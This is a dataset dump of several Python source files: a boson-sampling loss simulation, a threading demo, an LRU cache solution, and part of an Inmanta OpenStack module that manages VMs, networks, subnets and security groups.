probability_of_uniform_loss\n\n def simulate(self, input_state: ndarray) -> List[float]:\n initial_number_of_particles = int(sum(input_state))\n separable_states_weights = []\n\n # Using n, eta, l notation from the paper.\n n = initial_number_of_particles\n eta = self.probability_of_uniform_loss\n\n for number_of_particles_left in range(n + 1):\n l = number_of_particles_left\n separable_states_weights.append(pow(eta, l) * special.binom(n, l) * pow(1.0 - eta, n - l))\n\n number_of_particles_left_in_selected_separable_state = choice(arange(0, n + 1), p=separable_states_weights)\n\n strategy = FixedLossSimulationStrategy(self.interferometer_matrix,\n number_of_particles_left_in_selected_separable_state,\n self.number_of_modes)\n\n simulator = BosonSamplingSimulator(number_of_particles_left_in_selected_separable_state, n,\n self.number_of_modes, strategy)\n\n return simulator.get_classical_simulation_results()\n","sub_path":"src/simulation_strategies/UniformLossSimulationStrategy.py","file_name":"UniformLossSimulationStrategy.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"622220510","text":"import time\nimport threading\n\n\ndef calc_square(number):\n print(\"calculate square of numbers\")\n for n in number:\n time.sleep(0.2)\n print('Square: ', n * n)\n\n\ndef calc_cube(number):\n print(\"calculate cube of numbers\")\n for n in number:\n time.sleep(0.2)\n print('Cube: ', n * n * n)\n\n\narr = [2, 3, 8, 9]\nt = time.time()\nthread1 = threading.Thread(target=calc_square, args=(arr,))\nthread2 = threading.Thread(target=calc_cube, args=(arr,))\n\nthread1.start()\nthread2.start()\nthread1.join()\nthread2.join()\n\nprint(\"done in : \", time.time() - t)\nprint(\"Ha... I am done with all my work now!\")\n","sub_path":"Multithreading.py","file_name":"Multithreading.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"23211795","text":"class LRUNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n self.prev = None\n\n\nclass LRUCache(object):\n\n def __init__(self, capacity):\n \"\"\"\n :type capacity: int\n \"\"\"\n self.capacity = capacity\n self.length = 0\n\n self.dic = {}\n self.nodes = {} # key\n self.head = LRUNode(None)\n self.tail = LRUNode(None)\n self.head.next = self.tail\n self.tail.prev = self.head\n\n\n def get(self, key):\n \"\"\"\n :type key: int\n :rtype: int\n \"\"\"\n if key in self.dic.keys():\n t = self.nodes[key]\n tp = t.prev\n tn = t.next\n tp.next = tn\n tn.prev = tp\n\n h = self.head.next\n self.head.next = t\n h.prev = t\n t.next = h\n t.prev = self.head\n\n return self.dic[key]\n else:\n return -1\n\n\n\n def put(self, key, value):\n \"\"\"\n :type key: int\n :type value: int\n :rtype: void\n \"\"\"\n\n if key in self.dic.keys():\n self.dic[key] = value\n t = self.nodes[key]\n tp = t.prev\n tn = t.next\n tp.next = tn\n tn.prev = tp\n\n h = self.head.next\n self.head.next = t\n h.prev = t\n t.next = h\n t.prev = self.head\n else:\n if self.length == self.capacity:\n d = self.tail.prev\n t = d.prev\n t.next = self.tail\n self.tail.prev = t\n self.dic.pop(d.val)\n self.nodes.pop(d.val)\n self.length -= 1\n\n self.dic[key] = value\n\n n = LRUNode(key)\n self.nodes[key] = n\n\n t = self.head.next\n self.head.next = n\n t.prev = n\n n.prev = self.head\n n.next = t\n self.length += 1\n\n def printList(self):\n p = self.head\n while p != None:\n print(p.val)\n p = p.next\n\nif __name__ == '__main__':\n cache = LRUCache(2)\n cache.put(2, 1)\n cache.put(1, 1)\n cache.put(2, 3)\n cache.put(4, 1)\n # print(cache.get(1))\n print(cache.get(1))\n print(cache.get(2))\n\n cache.printList()","sub_path":"LeetCode/A146.py","file_name":"A146.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"62086307","text":"\"\"\"\n Copyright 2017 Inmanta\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n Contact: code@inmanta.com\n\"\"\"\n\nimport os\nimport traceback\nimport logging\nimport time\nimport datetime\nimport math\n\nfrom inmanta.execute import proxy, util\nfrom inmanta.resources import resource, PurgeableResource, ManagedResource\nfrom inmanta import resources\nfrom inmanta.agent import handler\nfrom inmanta.agent.handler import provider, SkipResource, cache, ResourcePurged, CRUDHandler\nfrom inmanta.export import dependency_manager\nfrom inmanta.plugins import plugin\n\nfrom neutronclient.common import exceptions\nfrom neutronclient.neutron import client as neutron_client\n\nfrom novaclient import client as nova_client\nimport novaclient.exceptions\n\nfrom keystoneauth1.identity import v3\nfrom keystoneauth1 import session\nfrom keystoneclient.v3 import client as keystone_client\n\nfrom glanceclient import client as glance_client\n\ntry:\n from keystoneclient.exceptions import NotFound\nexcept ImportError:\n from keystoneclient.openstack.common.apiclient.exceptions import NotFound\n\n# silence a logger\nloud_logger = logging.getLogger(\"requests.packages.urllib3.connectionpool\")\nloud_logger.propagate = False\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nIMAGES = {}\n\n@plugin\ndef find_image(provider: \"openstack::Provider\", os: \"std::OS\", name: \"string\"=None) -> \"string\":\n \"\"\"\n Search for an image that matches the given operating system. This plugin uses\n the os_distro and os_version tags of an image and the name and version attributes of\n the OS parameter.\n\n If multiple images match, the most recent image is returned.\n\n :param provider: The provider to query for an image\n :param os: The operating system and version (using os_distro and os_version metadata)\n :param name: An optional string that the image name should contain\n \"\"\"\n global IMAGES\n if provider.name not in IMAGES:\n auth = v3.Password(auth_url=provider.connection_url, username=provider.username,\n password=provider.password, project_name=provider.tenant,\n user_domain_id=\"default\", project_domain_id=\"default\")\n sess = session.Session(auth=auth)\n client = glance_client.Client(\"2\", session=sess)\n\n IMAGES[provider.name] = list(client.images.list())\n\n selected = (datetime.datetime(1900, 1, 1), None)\n for image in IMAGES[provider.name]:\n # only images that are public\n if (\"image_location\" not in image and image[\"visibility\"] == \"public\") and \\\n (\"os_distro\" in image and \"os_version\" in image) and \\\n (image[\"os_distro\"].lower() == os.name.lower() and image[\"os_version\"].lower() == str(os.version).lower()) and \\\n (name is None or name in image[\"name\"]):\n t = datetime.datetime.strptime(image[\"updated_at\"], \"%Y-%m-%dT%H:%M:%SZ\")\n if t > selected[0]:\n selected = (t, image)\n\n if len(selected) < 2 or selected[1][\"id\"] is None:\n raise Exception(\"No image found for os %s and version %s\" % (os.name, os.version))\n\n return selected[1][\"id\"]\n\nFLAVORS = {}\n\n@plugin\ndef find_flavor(provider: \"openstack::Provider\", vcpus: \"number\", ram: \"number\", pinned: \"bool\"=False) -> \"string\":\n \"\"\"\n Find the flavor that matches the closest to the resources requested.\n\n :param vcpus: The number of virtual cpus in the flavor\n :param ram: The amount of ram in megabyte\n :param pinned: Wether the CPUs need to be pinned (#vcpu == #pcpu)\n \"\"\"\n global FLAVORS\n if provider.name not in FLAVORS:\n auth = v3.Password(auth_url=provider.connection_url, username=provider.username,\n password=provider.password, project_name=provider.tenant,\n user_domain_id=\"default\", project_domain_id=\"default\")\n sess = session.Session(auth=auth)\n client = nova_client.Client(\"2.1\", session=sess)\n\n FLAVORS[provider.name] = list(client.flavors.list())\n\n selected = (1000000, None)\n for flavor in FLAVORS[provider.name]:\n keys = flavor.get_keys()\n is_pinned = \"hw:cpu_policy\" in keys and keys[\"hw:cpu_policy\"] == \"dedicated\"\n if is_pinned ^ pinned:\n continue\n\n d_cpu = flavor.vcpus - vcpus\n d_ram = (flavor.ram / 1024) - ram\n distance = math.sqrt(math.pow(d_cpu, 2) + math.pow(d_ram, 2))\n if d_cpu >= 0 and d_ram >= 0 and distance < selected[0]:\n selected = (distance, flavor)\n\n return selected[1].name\n\n\nclass OpenstackResource(PurgeableResource, ManagedResource):\n fields = (\"project\", \"admin_user\", \"admin_password\", \"admin_tenant\", \"auth_url\")\n\n @staticmethod\n def get_project(exporter, resource):\n return resource.project.name\n\n @staticmethod\n def get_admin_user(exporter, resource):\n return resource.provider.username\n\n @staticmethod\n def get_admin_password(exporter, resource):\n return resource.provider.password\n\n @staticmethod\n def get_admin_tenant(exporter, resource):\n return resource.provider.tenant\n\n @staticmethod\n def get_auth_url(exporter, resource):\n return resource.provider.connection_url\n\n\n@resource(\"openstack::VirtualMachine\", agent=\"provider.name\", id_attribute=\"name\")\nclass VirtualMachine(OpenstackResource):\n \"\"\"\n A virtual machine managed by a hypervisor or IaaS\n \"\"\"\n fields = (\"name\", \"flavor\", \"image\", \"key_name\", \"user_data\", \"key_value\", \"ports\", \"security_groups\", \"config_drive\")\n\n @staticmethod\n def get_key_name(exporter, vm):\n return vm.key_pair.name\n\n @staticmethod\n def get_key_value(exporter, vm):\n return vm.key_pair.public_key\n\n @staticmethod\n def get_user_data(exporter, vm):\n \"\"\"\n Return an empty string when the user_data value is unknown\n TODO: this is a hack\n \"\"\"\n try:\n ua = vm.user_data\n except proxy.UnknownException:\n ua = \"\"\n return ua\n\n @staticmethod\n def get_ports(_, vm):\n ports = []\n for p in vm.ports:\n port = {\"name\": p.name, \"address\": None, \"network\": p.subnet.name, \"dhcp\": p.dhcp, \"index\": p.port_index}\n try:\n port[\"address\"] = p.address\n except proxy.UnknownException:\n pass\n ports.append(port)\n\n return ports\n\n @staticmethod\n def get_security_groups(_, vm):\n return [v.name for v in vm.security_groups]\n\n\n@resource(\"openstack::Network\", agent=\"provider.name\", id_attribute=\"name\")\nclass Network(OpenstackResource):\n \"\"\"\n This class represents a network in neutron\n \"\"\"\n fields = (\"name\", \"external\", \"physical_network\", \"network_type\", \"segmentation_id\")\n\n\n@resource(\"openstack::Subnet\", agent=\"provider.name\", id_attribute=\"name\")\nclass Subnet(OpenstackResource):\n \"\"\"\n This class represent a subnet in neutron\n \"\"\"\n fields = (\"name\", \"network_address\", \"dhcp\", \"allocation_start\", \"allocation_end\", \"network\", \"dns_servers\")\n\n @staticmethod\n def get_network(_, subnet):\n return subnet.network.name\n\n\n@resource(\"openstack::Router\", agent=\"provider.name\", id_attribute=\"name\")\nclass Router(OpenstackResource):\n \"\"\"\n This class represent a router in neutron\n \"\"\"\n fields = (\"name\", \"subnets\", \"gateway\", \"ports\", \"routes\")\n\n @staticmethod\n def get_gateway(_, router):\n if hasattr(router.ext_gateway, \"name\"):\n return router.ext_gateway.name\n\n return \"\"\n\n @staticmethod\n def get_routes(_, router):\n routes = {route.destination: route.nexthop for route in router.routes}\n return routes\n\n @staticmethod\n def get_subnets(_, router):\n return sorted([subnet.name for subnet in router.subnets])\n\n @staticmethod\n def get_ports(_, router):\n return [p.name for p in router.ports]\n\n\n@resource(\"openstack::RouterPort\", agent=\"provider.name\", id_attribute=\"name\")\nclass RouterPort(OpenstackResource):\n \"\"\"\n A port in a router\n \"\"\"\n fields = (\"name\", \"address\", \"subnet\", \"router\", \"network\")\n\n @staticmethod\n def get_subnet(_, port):\n return port.subnet.name\n\n @staticmethod\n def get_network(_, port):\n return port.subnet.network.name\n\n @staticmethod\n def get_router(_, port):\n return port.router.name\n\n\n@resource(\"openstack::HostPort\", agent=\"provider.name\", id_attribute=\"name\")\nclass HostPort(OpenstackResource):\n \"\"\"\n A port in a router\n \"\"\"\n fields = (\"name\", \"address\", \"subnet\", \"host\", \"network\", \"portsecurity\", \"dhcp\", \"port_index\",\n \"retries\", \"wait\")\n\n @staticmethod\n def get_address(exporter, port):\n try:\n return port.address\n except proxy.UnknownException:\n return \"\"\n\n @staticmethod\n def get_subnet(_, port):\n return port.subnet.name\n\n @staticmethod\n def get_network(_, port):\n return port.subnet.network.name\n\n @staticmethod\n def get_host(_, port):\n return port.vm.name\n\n\n@resource(\"openstack::SecurityGroup\", agent=\"provider.name\", id_attribute=\"name\")\nclass SecurityGroup(OpenstackResource):\n \"\"\"\n A security group in an OpenStack tenant\n \"\"\"\n fields = (\"name\", \"description\", \"manage_all\", \"rules\", \"retries\", \"wait\")\n\n @staticmethod\n def get_rules(exporter, group):\n rules = []\n dedup = set()\n for rule in group.rules:\n json_rule = {\"protocol\": rule.ip_protocol,\n \"direction\": rule.direction}\n\n if rule.port > 0:\n json_rule[\"port_range_min\"] = rule.port\n json_rule[\"port_range_max\"] = rule.port\n\n else:\n json_rule[\"port_range_min\"] = rule.port_min\n json_rule[\"port_range_max\"] = rule.port_max\n\n if json_rule[\"port_range_min\"] == 0:\n json_rule[\"port_range_min\"] = None\n\n if json_rule[\"port_range_max\"] == 0:\n json_rule[\"port_range_max\"] = None\n\n try:\n json_rule[\"remote_ip_prefix\"] = rule.remote_prefix\n except Exception:\n pass\n\n try:\n json_rule[\"remote_group\"] = rule.remote_group.name\n except Exception:\n pass\n\n key = tuple(sorted(json_rule.items()))\n if key not in dedup:\n dedup.add(key)\n rules.append(json_rule)\n else:\n LOGGER.warning(\"A duplicate rule exists in security group %s\", group.name)\n\n return rules\n\n\n@resource(\"openstack::FloatingIP\", agent=\"provider.name\", id_attribute=\"name\")\nclass FloatingIP(OpenstackResource):\n \"\"\"\n A floating ip\n \"\"\"\n fields = (\"name\", \"port\", \"external_network\")\n\n @staticmethod\n def get_port(_, fip):\n return fip.port.name\n\n @staticmethod\n def get_external_network(_, fip):\n return fip.external_network.name\n\n\nclass KeystoneResource(PurgeableResource, ManagedResource):\n fields = (\"admin_token\", \"url\", \"admin_user\", \"admin_password\", \"admin_tenant\", \"auth_url\")\n\n @staticmethod\n def get_admin_token(_, resource):\n return resource.provider.token\n\n @staticmethod\n def get_url(_, resource):\n return os.path.join(resource.provider.admin_url, \"v2.0/\")\n\n @staticmethod\n def get_admin_user(exporter, resource):\n return resource.provider.username\n\n @staticmethod\n def get_admin_password(exporter, resource):\n return resource.provider.password\n\n @staticmethod\n def get_admin_tenant(exporter, resource):\n return resource.provider.tenant\n\n @staticmethod\n def get_auth_url(exporter, resource):\n return resource.provider.connection_url\n\n\n@resource(\"openstack::Project\", agent=\"provider.name\", id_attribute=\"name\")\nclass Project(KeystoneResource):\n \"\"\"\n This class represents a project in keystone\n \"\"\"\n fields = (\"name\", \"enabled\", \"description\")\n\n @staticmethod\n def get_project(exporter, resource):\n return resource.project.name\n\n\n@resource(\"openstack::User\", agent=\"provider.name\", id_attribute=\"name\")\nclass User(KeystoneResource):\n \"\"\"\n A user in keystone\n \"\"\"\n fields = (\"name\", \"email\", \"enabled\", \"password\")\n\n\n@resource(\"openstack::Role\", agent=\"provider.name\", id_attribute=\"role_id\")\nclass Role(KeystoneResource):\n \"\"\"\n A role that adds a user to a project\n \"\"\"\n fields = (\"role_id\", \"role\", \"project\", \"user\", \"project\")\n\n @staticmethod\n def get_project(exporter, resource):\n return resource.project.name\n\n @staticmethod\n def get_user(exporter, resource):\n return resource.user.name\n\n\n@resource(\"openstack::Service\", agent=\"provider.name\", id_attribute=\"name\")\nclass Service(KeystoneResource):\n \"\"\"\n A service for which endpoints can be registered\n \"\"\"\n fields = (\"name\", \"type\", \"description\")\n\n\n@resource(\"openstack::EndPoint\", agent=\"provider.name\", id_attribute=\"service_id\")\nclass EndPoint(KeystoneResource):\n \"\"\"\n An endpoint for a service\n \"\"\"\n fields = (\"region\", \"internal_url\", \"public_url\", \"admin_url\", \"service_id\")\n\n\n@dependency_manager\ndef openstack_dependencies(config_model, resource_model):\n projects = {}\n networks = {}\n routers = {}\n subnets = {}\n vms = {}\n ports = {}\n fips = {}\n sgs = {}\n router_map = {}\n\n for _, res in resource_model.items():\n if res.id.entity_type == \"openstack::Project\":\n projects[res.name] = res\n\n elif res.id.entity_type == \"openstack::Network\":\n networks[res.name] = res\n\n elif res.id.entity_type == \"openstack::Router\":\n routers[res.name] = res\n\n elif res.id.entity_type == \"openstack::Subnet\":\n subnets[res.name] = res\n\n elif res.id.entity_type == \"openstack::VirtualMachine\":\n vms[res.name] = res\n\n elif res.id.entity_type == \"openstack::HostPort\":\n ports[res.name] = res\n\n elif res.id.entity_type == \"openstack::FloatingIP\":\n fips[res.name] = res\n\n elif res.id.entity_type == \"openstack::SecurityGroup\":\n sgs[res.name] = res\n\n # they require the tenant to exist\n for network in networks.values():\n if network.model.project.name in projects:\n network.requires.add(projects[network.model.project.name])\n\n for router in routers.values():\n if router.model.project.name in projects:\n router.requires.add(projects[router.model.project.name])\n\n # depend on the attached subnets\n for subnet_name in router.subnets:\n if subnet_name in subnets:\n router.requires.add(subnets[subnet_name])\n\n # create external/subnet mapping\n router_map[(router.gateway, subnet_name)] = router\n\n if router.gateway in networks:\n router.requires.add(networks[router.gateway])\n\n for subnet in subnets.values():\n if subnet.model.project.name in projects:\n subnet.requires.add(projects[subnet.model.project.name])\n\n # also require the network it is attached to\n if subnet.model.network.name in networks:\n subnet.requires.add(networks[subnet.model.network.name])\n\n for vm in vms.values():\n if vm.model.project.name in projects:\n vm.requires.add(projects[vm.model.project.name])\n\n for port in vm.ports:\n if port[\"network\"] in subnets:\n vm.requires.add(subnets[port[\"network\"]])\n\n for sg in vm.security_groups:\n if sg in sgs:\n vm.requires.add(sgs[sg])\n\n for port in ports.values():\n if port.model.project.name in projects:\n port.requires.add(projects[port.model.project.name])\n\n if port.network in projects:\n port.requires.add(subnets[port.network])\n\n if port.host in vms:\n port.requires.add(vms[port.host])\n\n for fip in fips.values():\n if fip.external_network in networks:\n fip.requires.add(networks[fip.external_network])\n\n if fip.port in ports:\n port = ports[fip.port]\n fip.requires.add(port)\n\n # find router on which this floating ip is added\n key = (fip.external_network, port.subnet)\n if key in router_map:\n fip.requires.add(router_map[key])\n\n\nCRED_TIMEOUT = 600\nRESOURCE_TIMEOUT = 10\n\n\nclass OpenStackHandler(CRUDHandler):\n\n @cache(timeout=CRED_TIMEOUT)\n def get_session(self, auth_url, project, admin_user, admin_password):\n auth = v3.Password(auth_url=auth_url, username=admin_user, password=admin_password, project_name=project,\n user_domain_id=\"default\", project_domain_id=\"default\")\n sess = session.Session(auth=auth)\n return sess\n\n @cache(timeout=CRED_TIMEOUT)\n def get_nova_client(self, auth_url, project, admin_user, admin_password):\n return nova_client.Client(\"2.1\", session=self.get_session(auth_url, project, admin_user, admin_password))\n\n @cache(timeout=CRED_TIMEOUT)\n def get_neutron_client(self, auth_url, project, admin_user, admin_password):\n return neutron_client.Client(\"2.0\", session=self.get_session(auth_url, project, admin_user, admin_password))\n\n @cache(timeout=CRED_TIMEOUT)\n def get_keystone_client(self, auth_url, project, admin_user, admin_password):\n return keystone_client.Client(session=self.get_session(auth_url, project, admin_user, admin_password))\n\n def pre(self, ctx, resource):\n project = resource.admin_tenant\n self._nova = self.get_nova_client(resource.auth_url, project, resource.admin_user, resource.admin_password)\n self._neutron = self.get_neutron_client(resource.auth_url, project, resource.admin_user,\n resource.admin_password)\n self._keystone = self.get_keystone_client(resource.auth_url, project, resource.admin_user, resource.admin_password)\n\n def post(self, ctx, resource):\n self._nova = None\n self._neutron = None\n self._keystone = None\n\n def get_project_id(self, resource, name):\n \"\"\"\n Retrieve the id of a project based on the given name\n \"\"\"\n # Fallback for non admin users\n if resource.admin_tenant == name:\n session = self.get_session(resource.auth_url, resource.project, resource.admin_user, resource.admin_password)\n return session.get_project_id()\n\n try:\n project = self._keystone.projects.find(name=name)\n return project.id\n except Exception:\n raise\n\n def get_network(self, project_id, name=None, network_id=None):\n \"\"\"\n Retrieve the network id based on the name of the network\n \"\"\"\n query = {}\n if project_id is not None and network_id is None:\n query[\"tenant_id\"] = project_id\n\n if name is not None:\n query[\"name\"] = name\n elif network_id is not None:\n query[\"id\"] = network_id\n else:\n raise Exception(\"Either a name or an id needs to be provided.\")\n\n networks = self._neutron.list_networks(**query)\n if len(networks[\"networks\"]) == 0:\n return None\n\n elif len(networks[\"networks\"]) > 1:\n raise Exception(\"Found more than one network with name %s/id %s for project %s\" % (name, network_id, project_id))\n\n else:\n return networks[\"networks\"][0]\n\n def get_subnet(self, project_id, name=None, subnet_id=None):\n \"\"\"\n Retrieve the subnet id based on the name of the network\n \"\"\"\n if name is not None:\n subnets = self._neutron.list_subnets(tenant_id=project_id, name=name)\n elif subnet_id is not None:\n subnets = self._neutron.list_subnets(tenant_id=project_id, id=subnet_id)\n else:\n raise Exception(\"Either a name or an id needs to be provided.\")\n\n if len(subnets[\"subnets\"]) == 0:\n return None\n\n elif len(subnets[\"subnets\"]) > 1:\n raise Exception(\"Found more than one subnet with name %s for project %s\" % (name, project_id))\n\n else:\n return subnets[\"subnets\"][0]\n\n def get_router(self, project_id=None, name=None, router_id=None):\n \"\"\"\n Retrieve the router id based on the name of the network\n \"\"\"\n query = {}\n if project_id is not None:\n query[\"tenant_id\"] = project_id\n\n if name is not None:\n query[\"name\"] = name\n elif router_id is not None:\n query[\"id\"] = router_id\n else:\n raise Exception(\"Either a name or an id needs to be provided.\")\n\n routers = self._neutron.list_routers(**query)\n\n if len(routers[\"routers\"]) == 0:\n return None\n\n elif len(routers[\"routers\"]) > 1:\n raise Exception(\"Found more than one router with name %s for project %s\" % (name, project_id))\n\n else:\n return routers[\"routers\"][0]\n\n def get_host_id(self, project_id, name):\n return self.get_host(project_id, name).id\n\n def get_host(self, project_id, name):\n \"\"\"\n Retrieve the router id based on the name of the network\n \"\"\"\n vms = self._nova.servers.findall(name=name)\n\n if len(vms) == 0:\n return None\n\n elif len(vms) > 1:\n raise Exception(\"Found more than one VM with name %s for project %s\" % (name, project_id))\n\n else:\n return vms[0]\n\n def get_host_for_id(self, server_id):\n \"\"\"\n Retrieve the router id based on the name of the network\n \"\"\"\n vms = self._nova.servers.findall(id=server_id)\n\n if len(vms) == 0:\n return None\n\n elif len(vms) > 1:\n raise Exception(\"Found more than one VM with id %s\" % (server_id))\n\n else:\n return vms[0]\n\n def get_security_group(self, ctx, name=None, group_id=None):\n \"\"\"\n Get security group details from openstack\n \"\"\"\n if name is not None:\n sgs = self._neutron.list_security_groups(name=name)\n elif group_id is not None:\n sgs = self._neutron.list_security_groups(id=group_id)\n\n if len(sgs[\"security_groups\"]) == 0:\n return None\n elif len(sgs[\"security_groups\"]) > 1:\n ctx.warning(\"Multiple security groups with name %(name)s exist.\", name=name, groups=sgs[\"security_groups\"])\n\n return sgs[\"security_groups\"][0]\n\n\n@provider(\"openstack::VirtualMachine\", name=\"openstack\")\nclass VirtualMachineHandler(OpenStackHandler):\n @cache(timeout=10)\n def get_vm(self, ctx, resource):\n if resource.project == resource.admin_tenant:\n servers = self._nova.servers.list(search_opts={\"name\": resource.name})\n else:\n try:\n project_id = self.get_project_id(resource, resource.project)\n servers = self._nova.servers.list(search_opts={\"all_tenants\": True, \"tenant_id\": project_id,\n \"name\": resource.name})\n except Exception:\n ctx.exception(\"Unable to retrieve server list with a scoped login on project %(admin_project)s, \"\n \"for project %(project)s. This only works with admin credentials.\",\n admin_project=resource.admin_tenant, project=resource.project, traceback=traceback.format_exc())\n return None\n\n # OS query semantic are not == but \"in\". So \"mon\" matches mon and mongo\n # Filter again to ensure a correct result\n servers = [x for x in servers if x.name == resource.name]\n if len(servers) == 0:\n return None\n\n elif len(servers) == 1:\n return servers[0]\n\n else:\n raise Exception(\"Multiple virtual machines with name %s exist.\" % resource.name)\n\n @cache(timeout=10)\n def _port_id(self, port_name):\n ports = self._neutron.list_ports(name=port_name)\n if len(ports[\"ports\"]) > 0:\n return ports[\"ports\"][0][\"id\"]\n\n return None\n\n @cache(timeout=10)\n def _get_subnet_id(self, subnet_name):\n subnets = self._neutron.list_subnets(name=subnet_name)\n if len(subnets[\"subnets\"]) > 0:\n return subnets[\"subnets\"][0][\"network_id\"]\n\n return None\n\n def _create_nic_config(self, port):\n nic = {}\n port_id = self._port_id(port[\"name\"])\n if port_id is None:\n network = self._get_subnet_id(port[\"network\"])\n if network is None:\n raise SkipResource(\"Network %s not found\" % port[\"network\"])\n nic[\"net-id\"] = network\n if not port[\"dhcp\"] and port[\"address\"] is not None:\n nic[\"v4-fixed-ip\"] = port[\"address\"]\n else:\n nic[\"port-id\"] = port_id\n\n return nic\n\n def _build_nic_list(self, ports):\n # build a list of nics for this server based on the index in the ports\n no_sort = sorted([p for p in ports if p[\"index\"] == 0], key=lambda x: x[\"network\"])\n sort = sorted([p for p in ports if p[\"index\"] > 0], key=lambda x: x[\"index\"])\n\n return [self._create_nic_config(p) for p in sort] + [self._create_nic_config(p) for p in no_sort]\n\n def _build_sg_list(self, ctx, security_groups):\n sg_list = []\n for group in security_groups:\n sg = self.get_security_group(ctx, name=group)\n if sg is not None:\n sg_list.append(sg[\"name\"])\n return sg_list\n\n def _ensure_key(self, ctx, resource):\n keys = {k.name: k for k in self._nova.keypairs.list()}\n if resource.key_name not in keys:\n self._nova.keypairs.create(resource.key_name, resource.key_value)\n ctx.info(\"Created a new keypair with name %(name)s\", name=resource.key_name)\n\n def read_resource(self, ctx, resource):\n \"\"\"\n This method will check what the status of the give resource is on\n openstack.\n \"\"\"\n server = self.get_vm(ctx, resource)\n if server is None:\n raise ResourcePurged()\n\n else:\n resource.purged = False\n resource.security_groups = [sg.name for sg in server.list_security_group()]\n # The port handler has to handle all network/port related changes\n\n ctx.set(\"server\", server)\n\n def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n if resource.admin_tenant != resource.project:\n ctx.error(\"The nova API does not allow to create virtual machines in an other project than the one logged into.\"\n \" Current login %(admin_project)s, requested project %(project)s\",\n admin_project=resource.admin_tenant, project=resource.project)\n raise Exception()\n\n self._ensure_key(ctx, resource)\n flavor = self._nova.flavors.find(name=resource.flavor)\n nics = self._build_nic_list(resource.ports)\n self._nova.servers.create(resource.name, flavor=flavor.id, userdata=resource.user_data, nics=nics,\n security_groups=self._build_sg_list(ctx, resource.security_groups),\n image=resource.image, key_name=resource.key_name, config_drive=resource.config_drive)\n ctx.set_created()\n\n def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n server = ctx.get(\"server\")\n server.delete()\n\n # Wait until the server has been deleted\n count = 0\n ctx.info(\"Server deleted, waiting for neutron to report all ports deleted.\")\n while server is not None and count < 60:\n ports = self._neutron.list_ports(device_id=server.id)\n if len(ports[\"ports\"]) > 0:\n time.sleep(1)\n count += 1\n else:\n server = None\n\n if server is not None:\n ctx.warning(\"Delete still in progress, giving up waiting.\")\n\n ctx.set_purged()\n\n def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n server = ctx.get(\"server\")\n\n self._ensure_key(ctx, resource)\n if \"security_groups\" in changes:\n current = set(changes[\"security_groups\"][\"current\"])\n desired = set(changes[\"security_groups\"][\"desired\"])\n\n for new_rule in (desired - current):\n self._nova.servers.add_security_group(server, new_rule)\n\n for remove_rule in (current - desired):\n self._nova.servers.remove_security_group(server, remove_rule)\n\n ctx.set_updated()\n\n def facts(self, ctx, resource):\n ctx.debug(\"Finding facts for %s\" % resource.id.resource_str())\n\n try:\n vm = self.get_vm(ctx, resource)\n\n networks = vm.networks\n\n facts = {}\n for name, ips in networks.items():\n for i in range(len(ips)):\n facts[\"subnet_%s_ip_%d\" % (name, i)] = ips[i]\n if i == 0:\n facts[\"subnet_%s_ip\" % name] = ips[i]\n\n # Get the private ip of the first port\n project_id = self.get_project_id(resource, resource.project)\n network_one = None\n for port in resource.ports:\n if port[\"index\"] == 1:\n network_one = port[\"network\"]\n\n if project_id is not None and network_one is not None:\n ports = self._neutron.list_ports(device_id=vm.id)\n for port in ports[\"ports\"]:\n for ips in port[\"fixed_ips\"]:\n subnet = self.get_subnet(project_id, subnet_id=ips[\"subnet_id\"])\n if subnet[\"name\"] == network_one:\n facts[\"ip_address\"] = ips[\"ip_address\"]\n\n return facts\n except Exception:\n return {}\n\n\n@provider(\"openstack::Network\", name=\"openstack\")\nclass NetworkHandler(OpenStackHandler):\n def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource):\n network = self.facts(ctx, resource)\n\n if len(network) > 0:\n resource.purged = False\n resource.external = network[\"router:external\"]\n if resource.physical_network != \"\":\n resource.physical_network = network[\"provider:physical_network\"]\n\n if resource.network_type != \"\":\n resource.network_type = network[\"provider:network_type\"]\n\n if resource.segmentation_id > 0:\n resource.segmentation_id = network[\"provider:segmentation_id\"]\n\n ctx.set(\"network_id\", network[\"id\"])\n ctx.set(\"project_id\", network[\"tenant_id\"])\n\n else:\n raise ResourcePurged()\n\n def _create_dict(self, resource: Network, project_id):\n net = {\"name\": resource.name, \"tenant_id\": project_id, \"admin_state_up\": True, \"router:external\": resource.external}\n\n if resource.physical_network != \"\":\n net[\"provider:physical_network\"] = resource.physical_network\n\n if resource.network_type != \"\":\n net[\"provider:network_type\"] = resource.network_type\n\n if resource.segmentation_id > 0:\n net[\"provider:segmentation_id\"] = resource.segmentation_id\n\n return net\n\n def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource):\n project_id = self.get_project_id(resource, resource.project)\n self._neutron.create_network({\"network\": self._create_dict(resource, project_id)})\n ctx.set_created()\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource):\n network_id = ctx.get(\"network_id\")\n self._neutron.delete_network(network_id)\n ctx.set_purged()\n\n def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource):\n network_id = ctx.get(\"network_id\")\n self._neutron.update_network(network_id, {\"network\": {\"name\": resource.name, \"router:external\": resource.external}})\n\n ctx.fields_updated((\"name\", \"external\"))\n ctx.set_updated()\n\n def facts(self, ctx, resource: Network):\n try:\n networks = self._neutron.list_networks(name=resource.name)[\"networks\"]\n except NotFound:\n return {}\n\n if len(networks) == 0:\n return {}\n\n if len(networks) > 1:\n LOGGER.warning(\"Multiple networks with the same name available!\")\n return 